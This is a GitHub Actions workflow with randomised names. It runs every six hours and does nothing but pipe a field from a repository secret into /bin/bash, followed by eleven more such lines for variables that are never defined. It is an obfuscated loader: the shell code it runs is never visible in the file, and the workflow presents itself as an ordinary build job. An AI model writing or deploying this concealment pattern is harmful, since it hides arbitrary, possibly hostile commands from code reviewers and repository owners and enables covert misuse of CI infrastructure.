name: niyelaitiantianyihuo

on:
  workflow_dispatch:
  schedule:
    - cron: '41 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: niyelaitiantianyihuo
        env:
          yiicy9471: ${{ secrets.yiicy9471 }}
        run: |
          echo $yiicy9471 | jq -r .zdwni94 | /bin/bash
          echo $qhbpi02 | jq -r .ogy70 | /bin/bash
          echo $tuvt8 | jq -r .ftiv61 | /bin/bash
          echo $rhtc6888 | jq -r .wh9437 | /bin/bash
          echo $roa7907 | jq -r .so40631 | /bin/bash
          echo $nbhy4831 | jq -r .un92 | /bin/bash
          echo $pfn2 | jq -r .amfy3 | /bin/bash
          echo $pbdpt86127 | jq -r .gtqgd362 | /bin/bash
          echo $esmpu7 | jq -r .y26 | /bin/bash
          echo $xd94016 | jq -r .kic3189 | /bin/bash
          echo $lcory1 | jq -r .knhfz23 | /bin/bash
          echo $vi47432 | jq -r .htbx05 | /bin/bash

